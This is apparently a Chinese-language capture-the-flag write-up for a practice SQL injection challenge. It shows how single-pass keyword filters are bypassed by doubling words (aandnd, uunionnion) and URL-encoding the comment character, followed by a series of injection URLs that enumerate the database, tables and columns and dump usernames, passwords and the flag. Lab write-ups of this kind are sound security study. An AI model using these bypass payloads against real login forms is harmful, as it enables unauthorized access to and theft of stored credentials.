啟動靶機熟悉的介面
測試發現or被過濾且輸入#號無法起到註釋作用
猜測本靶機考點過濾查詢關鍵詞語句or,union,select,and,by和註釋符#
測試後查詢關鍵詞發現過濾只是單次過濾 可以使用aandnd,oorr,uunionnion等繞過過濾
而#則可以用urlencode編碼格式變成%23繞過,接下來我們進行常規構造語句繞過
報錯說明有3個欄位
?username=admin' aandnd 1=2 oorrder bbyy 4 %23&password=123
測得回顯點位2,3 ?username=admin' aandnd 1=2 uunionnion sselectelect 1,2,3 %23&password=123
獲得資料庫名geek,版本10.3.18-MariaDB ?username=admin' aandnd 1=2 uunionnion sselectelect 1,database(),version() %23&password=123
獲得表名b4bsql,geekuser
?username=admin' aandnd 1=2 uunionnion sselectelect 1, 2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema ='geek' %23&password=123
獲得列名 id username password
?username=admin' aandnd 1=2 uunionnion sselectelect 1, 2,group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='geekuser' %23&password=123
查詢flag
?username=admin' aandnd 1=2 uunionnion sselectelect 1, group_concat(username),group_concat(passwoorrd) ffromrom b4bsql%23&password=123
檢視原始碼獲得flag flag{bdc135ab-5320-46d6-b4f2-5d1231ead3a1}
